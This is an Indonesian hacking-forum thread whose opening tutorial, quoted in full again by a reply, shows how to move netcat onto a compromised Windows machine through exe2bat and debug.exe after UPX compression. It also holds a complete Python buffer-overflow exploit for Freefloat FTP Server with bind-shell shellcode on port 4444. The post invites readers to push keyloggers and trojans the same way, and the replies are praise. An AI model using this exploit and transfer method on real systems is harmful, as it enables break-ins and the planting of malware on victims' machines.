[Share] Eps. 2 " "THE SECRET TEKNIK OF FILE TRANSFER ON PENTESTING"
#1
Hallo semuanya
welcome back...


EPISODE 2 

tutorial ini akan melanjutkan tutorial yang kemarin,




“the secret teknik of file transfer on pentesting”, kenapa teknik file transfer ini disebut secret teknik, karena teknik file transfer ini termasuk unknown teknik/uncommon teknik (OffSec quote)

Teknik ini digunakan ketika kita telah mendpatkan shell korban dengan memanfaatkan debug.exe yang secara default sudah ada di kebanyakan versi windows.
(WITHOUT METASPLOIT/meterpreter)




Introduction. (Read Carefully)





Debug.exe sudah eksis maupun terinstall secara default di kebanyakan windows versi,
Teknik ini terimplemetasikan dengan cara mengubah file yang akan di transfer (dalam kasus ini file NC.EXE) menjadi file berformat txt (hex), dan copy paste file.txt tersebut (terkandung file nc.exe dalam bentuk hex) ke shell korban dan kemudian dicompile secara lokal di shell korban dengan menggunakan debug.exe. 
          Bagaimana, kita mengubah file NC.EXE menjadi bentuk file TXT, yang kemudiaan akan di copy paste di shell korban.Di Backtrack maupun kali linux sudah terisntall exe2bat (windows binary). Fungsi exe2bat adalah akan mengubah/mengconvert file NC.EXE menjadi file TXT (hex), dalam file TXT tersebut terkandung “echo command” yang kemudian secara mudah bisa dicopy pastekan di shell korban (command prompt) dan akan running secara otomatis.
        Teknik ini mempuyai limitation, file yang akan di upload tidak bisa lebih dari 64 (byte in length), dikarenakan NC.EXE 59362 (byte in size), maka oleh karena itu kita kan mengcompress file NC.EXE dengan UPX.


Untuk lebih jelasnya silakan di lihat POC ya.
Kita compress file NC.exe dengan UPX

1. file nc.exe berukuran 59392
2. dengan upx kita compress menjadi 49.14 % lebih kecil menjadi 29184
3. nantinya kita tidak perlu uncompress lagi file nc.exe tersebut, file tersebut aka berfungsi normal
    sama seperti sebelum di kompress


[Image: 2ufvcrl.jpg]



kemudian kita ubah file nc.exe menjadi txt yang terinput echo command, dengan exe2bat,
kita jalankan exe2bat ingat exe2bat adalah windows binary, maka kita akan menggunakan wine.
Digambarkan exebat berhasil mengubah file nc.txt menjadi file berextensi txt.
Kita lihat isi file nc.txt dengan menggunakan bluefish


[Image: sfwc5y.jpg]




setelah kita buka dengan editor kita, kita bisa lihat bahwa exe2bat mengubah file nc.exe menjadi file nc.txt dengan di dalamnya terdapat echo command sehingga akan mudah di copy paste di shell korban, setelah semua persiapan selesai, saatnya kita exploit korban, saya menggunakan exploit ftp.


[Image: 29cqvj6.jpg]




Karena di tutorial kemarin banyak yang usul atau bertanya tentang exlploitya, di session ini saya sertakan screenshot exlploitya, sehingga mudah untuk dimengerti.
dan akhirnya kita mendapatkan shell korban tanpa menggunakan metasploit 
     jika kita menggunakan metasploit (meterpreter) mudah kita jika akan mendownload/ mengupload file dari/ke victim shell, bagaimana jika hanya menggunakan manual exploit.dengan mengeksekusi exploit lalu dengan telnet kita akan mendapatkan shell prompt korban.
maka tutorial ini lah di buat …....... 


[Image: 2059xt4.jpg]




setelah kita mendapatkan shell korban saatnya kita mentransfer file,,
kita kembali ke bluefish ato editor kesayangan kita, copy paste semua file (nc.txt) di dalamnya yang nantinya kita pastekan ke shell (command prompt) victim, jika koneksi lancar  akhir proses akan seperti gambar.

Keterangan:
lihat yang saya highlight keliahatanya eror, tapi kemudian saya ulang copy paste copy 1.dll.
Secara otomatis file transfer akan tercompile dengan sendirinya. Lihat SS selanjutnya bahwa kita telah sukses mentransfer file nc.exe di shell korban … Smile


[Image: 2zp2n0j.jpg]



[Image: 28lw10h.jpg]


lalu pasti pertanyaan selanjutnya …
IS'T  FUNCTIONAL ??????

[Image: 10dgys0.jpg]

[Image: 140c5qg.jpg]


semuanya masih bingung, silakan di coba di rumah, sejujurnya saja saya sendiri bingung menulis kata2, karena banyak hal yang sulit di jelaskan, tapi setidaknya, tutorial ini sedikit memberi gambaran,, how transfer file working.
Di tutorial selanjutnya akan saya jelaskan teknik file transfer yang lebih extreme, yang mengkin kebayakan orang belum pernah melihat ha...ha...ha
masih sama dengan memanfaatkan file/tool yang secara default sudah terinstall di windows system.


HOME WORK:

silakan di praktekan teknik file transfer ini dengan file2 lainya, seperti plink, atau keyloagger, trojan maupun lainya,
sehingga tidak sia2 anda membaca tutorial ini. Trry to “unlock your skill” jika ada eror2 tetaplah “TRY HARDER”


Please jika memang tutorial ini berguna dan bermanfaat kan alangkah baiknya jika bisa di post di web2 atau blog2 kalian sehingga akan banyak saudara2 kita yang bisa membaca,dengan tidak meninggalkan sumbernya,

if there is question do not hesitate contact me here

exploit 


Code:
#!/usr/bin/python

import socket
import sys

def usage():

       print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
       print "example: ./freefloatftp.py 192.168.1.100 21"

#Bind Shell shellcode port 4444
shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
"\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
"\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
"\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
"\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
"\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
"\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
"\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
"\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
"\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
"\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
"\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
"\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
"\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
"\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
"\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
"\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
"\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
"\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
"\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
"\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
"\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
"\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")


junk1  = "\x41" * 230
eip    = "\x53\x93\x42\x7E"  #7E429353 JMP ESP
nops   = "\x90" * 16
junk2  = "\x43" * (1000 - len(junk1 + eip + nops + shellcode))

buff   = junk1 + eip + nops + shellcode + junk2

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "\n"    
print "----------------------------------------------------------------"
print "|      Freefloat FTP Server Buffer Overflow Vulnerability      |"
print "----------------------------------------------------------------"
print "\n"


if len(sys.argv) != 3:
    usage()
       sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

try:
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip,int(port)))
    data = s.recv(1024)
    print("[-] Sending exploit...")
    s.send('USER ' + buff + '\r\n')
    s.close()
    print("[-] Exploit successfully sent...")
    print("[-] Connect to " + ip + " on port 4444")
except:
    print("[-] Connection error...")
    print("[-] Check if victim is up.")


cara yang salah memperingati hari kartini, contohlah jiwa nasionalisme ya dan emansipasinya, bukan cara berpakainya.

#2
(11-18-2014, 06:05 AM)tirtana Wrote: Hallo semuanya

welcome back...


EPISODE 2 

tutorial ini akan melanjutkan tutorial yang kemarin,




“the secret teknik of file transfer on pentesting”, kenapa teknik file transfer ini disebut secret teknik, karena teknik file transfer ini termasuk unknown teknik/uncommon teknik (OffSec quote)

Teknik ini digunakan ketika kita telah mendpatkan shell korban dengan memanfaatkan debug.exe yang secara default sudah ada di kebanyakan versi windows.
(WITHOUT METASPLOIT/meterpreter)




Introduction. (Read Carefully)






Debug.exe sudah eksis maupun terinstall secara default di kebanyakan windows versi,
Teknik ini terimplemetasikan dengan cara mengubah file yang akan di transfer (dalam kasus ini file NC.EXE) menjadi file berformat txt (hex), dan copy paste file.txt tersebut (terkandung file nc.exe dalam bentuk hex) ke shell korban dan kemudian dicompile secara lokal di shell korban dengan menggunakan debug.exe. 
          Bagaimana, kita mengubah file NC.EXE menjadi bentuk file TXT, yang kemudiaan akan di copy paste di shell korban.Di Backtrack maupun kali linux sudah terisntall exe2bat (windows binary). Fungsi exe2bat adalah akan mengubah/mengconvert file NC.EXE menjadi file TXT (hex), dalam file TXT tersebut terkandung “echo command” yang kemudian secara mudah bisa dicopy pastekan di shell korban (command prompt) dan akan running secara otomatis.
        Teknik ini mempuyai limitation, file yang akan di upload tidak bisa lebih dari 64 (byte in length), dikarenakan NC.EXE 59362 (byte in size), maka oleh karena itu kita kan mengcompress file NC.EXE dengan UPX.


Untuk lebih jelasnya silakan di lihat POC ya.
Kita compress file NC.exe dengan UPX

1. file nc.exe berukuran 59392
2. dengan upx kita compress menjadi 49.14 % lebih kecil menjadi 29184
3. nantinya kita tidak perlu uncompress lagi file nc.exe tersebut, file tersebut aka berfungsi normal
    sama seperti sebelum di kompress


[Image: 2ufvcrl.jpg]



kemudian kita ubah file nc.exe menjadi txt yang terinput echo command, dengan exe2bat,
kita jalankan exe2bat ingat exe2bat adalah windows binary, maka kita akan menggunakan wine.
Digambarkan exebat berhasil mengubah file nc.txt menjadi file berextensi txt.
Kita lihat isi file nc.txt dengan menggunakan bluefish


[Image: sfwc5y.jpg]




setelah kita buka dengan editor kita, kita bisa lihat bahwa exe2bat mengubah file nc.exe menjadi file nc.txt dengan di dalamnya terdapat echo command sehingga akan mudah di copy paste di shell korban, setelah semua persiapan selesai, saatnya kita exploit korban, saya menggunakan exploit ftp.


[Image: 29cqvj6.jpg]




Karena di tutorial kemarin banyak yang usul atau bertanya tentang exlploitya, di session ini saya sertakan screenshot exlploitya, sehingga mudah untuk dimengerti.
dan akhirnya kita mendapatkan shell korban tanpa menggunakan metasploit 
     jika kita menggunakan metasploit (meterpreter) mudah kita jika akan mendownload/ mengupload file dari/ke victim shell, bagaimana jika hanya menggunakan manual exploit.dengan mengeksekusi exploit lalu dengan telnet kita akan mendapatkan shell prompt korban.
maka tutorial ini lah di buat …....... 


[Image: 2059xt4.jpg]




setelah kita mendapatkan shell korban saatnya kita mentransfer file,,
kita kembali ke bluefish ato editor kesayangan kita, copy paste semua file (nc.txt) di dalamnya yang nantinya kita pastekan ke shell (command prompt) victim, jika koneksi lancar  akhir proses akan seperti gambar.

Keterangan:
lihat yang saya highlight keliahatanya eror, tapi kemudian saya ulang copy paste copy 1.dll.
Secara otomatis file transfer akan tercompile dengan sendirinya. Lihat SS selanjutnya bahwa kita telah sukses mentransfer file nc.exe di shell korban … Smile


[Image: 2zp2n0j.jpg]



[Image: 28lw10h.jpg]


lalu pasti pertanyaan selanjutnya …
IS'T  FUNCTIONAL ??????

[Image: 10dgys0.jpg]

[Image: 140c5qg.jpg]


semuanya masih bingung, silakan di coba di rumah, sejujurnya saja saya sendiri bingung menulis kata2, karena banyak hal yang sulit di jelaskan, tapi setidaknya, tutorial ini sedikit memberi gambaran,, how transfer file working.
Di tutorial selanjutnya akan saya jelaskan teknik file transfer yang lebih extreme, yang mengkin kebayakan orang belum pernah melihat ha...ha...ha
masih sama dengan memanfaatkan file/tool yang secara default sudah terinstall di windows system.


HOME WORK:

silakan di praktekan teknik file transfer ini dengan file2 lainya, seperti plink, atau keyloagger, trojan maupun lainya,
sehingga tidak sia2 anda membaca tutorial ini. Trry to “unlock your skill” jika ada eror2 tetaplah “TRY HARDER”


Please jika memang tutorial ini berguna dan bermanfaat kan alangkah baiknya jika bisa di post di web2 atau blog2 kalian sehingga akan banyak saudara2 kita yang bisa membaca,dengan tidak meninggalkan sumbernya,

if there is question do not hesitate contact me here

exploit 


Code:
#!/usr/bin/python

import socket
import sys

def usage():

       print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
       print "example: ./freefloatftp.py 192.168.1.100 21"

#Bind Shell shellcode port 4444
shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
"\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
"\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
"\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
"\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
"\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
"\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
"\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
"\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
"\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
"\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
"\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
"\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
"\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
"\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
"\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
"\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
"\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
"\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
"\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
"\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
"\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
"\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")


junk1  = "\x41" * 230
eip    = "\x53\x93\x42\x7E"  #7E429353 JMP ESP
nops   = "\x90" * 16
junk2  = "\x43" * (1000 - len(junk1 + eip + nops + shellcode))

buff   = junk1 + eip + nops + shellcode + junk2

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "\n"    
print "----------------------------------------------------------------"
print "|      Freefloat FTP Server Buffer Overflow Vulnerability      |"
print "----------------------------------------------------------------"
print "\n"


if len(sys.argv) != 3:
    usage()
       sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

try:
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip,int(port)))
    data = s.recv(1024)
    print("[-] Sending exploit...")
    s.send('USER ' + buff + '\r\n')
    s.close()
    print("[-] Exploit successfully sent...")
    print("[-] Connect to " + ip + " on port 4444")
except:
    print("[-] Connection error...")
    print("[-] Check if victim is up.")


waahh..ilmu baru buat ayas.
ijin praktek ndan.. Big Grin







#3
wow super sekali

#4
keren nih tutorialnya , pengen tak coba Big Grin
share beginianya yang dibanyakin ya bro Big Grin

#5
10 jempol buat TS. keren tutor yg ada picturenya, jadi bisa tergambar dengan jelas






Users browsing this thread: 1 Guest(s)